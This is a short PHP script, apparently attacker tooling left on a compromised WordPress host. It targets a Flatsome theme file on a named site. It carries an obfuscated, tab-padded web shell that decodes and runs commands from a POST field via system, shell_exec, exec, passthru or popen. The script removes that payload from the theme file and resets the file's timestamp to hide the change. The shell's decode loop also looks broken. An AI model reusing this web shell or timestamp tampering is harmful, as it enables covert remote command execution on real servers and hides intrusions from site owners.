/home/ramtczxy/.cagefs/tmp/.uconvert
<?php  $path = '/home/ramtczxy/exoticcockatoos.com/wp-content/themes/flatsome/inc/extensions/flatsome-ajax-add-to-cart/flatsome-ajax-add-to-cart.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('%24data_storage%20%3D%20%22he%5Cx78%5Cx32b%5Cx69n%22%3B%20%24restore_state4%20%3D%20%22p%5Cx61s%5Cx73%5Cx74%5Cx68ru%22%3B%20%24restore_state2%20%3D%20%22%5Cx73%5Cx68ell_%5Cx65%5Cx78ec%22%3B%20%24restore_state5%20%3D%20%22pope%5Cx6E%22%3B%20%24restore_state7%20%3D%20%22%5Cx70%5Cx63%5Cx6Cose%22%3B%20%24restore_state3%20%3D%20%22ex%5Cx65c%22%3B%20%24restore_state1%20%3D%20%22%5Cx73%5Cx79%5Cx73tem%22%3B%20%24restore_state6%20%3D%20%22%5Cx73%5Cx74r%5Cx65%5Cx61m%5Cx5Fg%5Cx65t_%5Cx63%5Cx6F%5Cx6E%5Cx74ents%22%3B%20if%20%28isset%28%24_POST%5B%22co%5Cx6D%5Cx70%22%5D%29%29%20%7B%20function%20event_handler%28%20%24k%20%2C%20%24ent%20%29%20%7B%20%24pointer%20%3D%20%27%27%20%3B%20for%28%24k%3D0%3B%20%24k%3Cstrlen%28%24k%29%3B%20%24k%2B%2B%29%7B%20%24pointer.%3Dchr%28ord%28%24k%5B%24k%5D%29%5E%24ent%29%3B%20%7D%20return%20%24pointer%3B%20%7D%20%24comp%20%3D%20%24data_storage%28%24_POST%5B%22co%5Cx6D%5Cx70%22%5D%29%3B%20%24comp%20%3D%20event_handler%28%24comp%2C%2045%29%3B%20if%20%28function_exists%28%24restore_state1%29%29%20%7B%20%24restore_state1%28%24comp%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state2%29%29%20%7B%20print%20%24restore_state2%28%24comp%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state3%29%29%20%7B%20%24restore_state3%28%24comp%2C%20%24flg_k%29%3B%20print%20join%28%22%5Cn%22%2C%20%24flg_k%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state4%29%29%20%7B%20%24restore_state4%28%24comp%29%3B%20%7D%20elseif%20%28function_exists%28%24restore_state5%29%20%26%26%20function_exists%28%24restore_state6%29%20%26%26%20function_exists%28%24restore_state7%29%29%20%7B%20%24ent_pointer%20%3D%20%24restore_state5%28%24comp%2C%20%27r%27%29%3B%20if%20%28%24ent_pointer%29%20%7B%20%24item_obj%20%3D%20%24restore_state6%28%24ent_pointer%29%3B%20%24restore_state7%28%24ent_pointer%29%3B%20print%20%24item_obj%3B%20%7D%20%7D%20exit%3B%20%7D')."\n"; if (file_exists($path) && is_writable($path)) {     $content = file_get_contents($path);     if (strpos($content, $new_content) !== FALSE) {         $content = str_replace($new_content, '', $content);         file_put_contents($path, $content);         @touch($path, $ft);     } } die('!success!');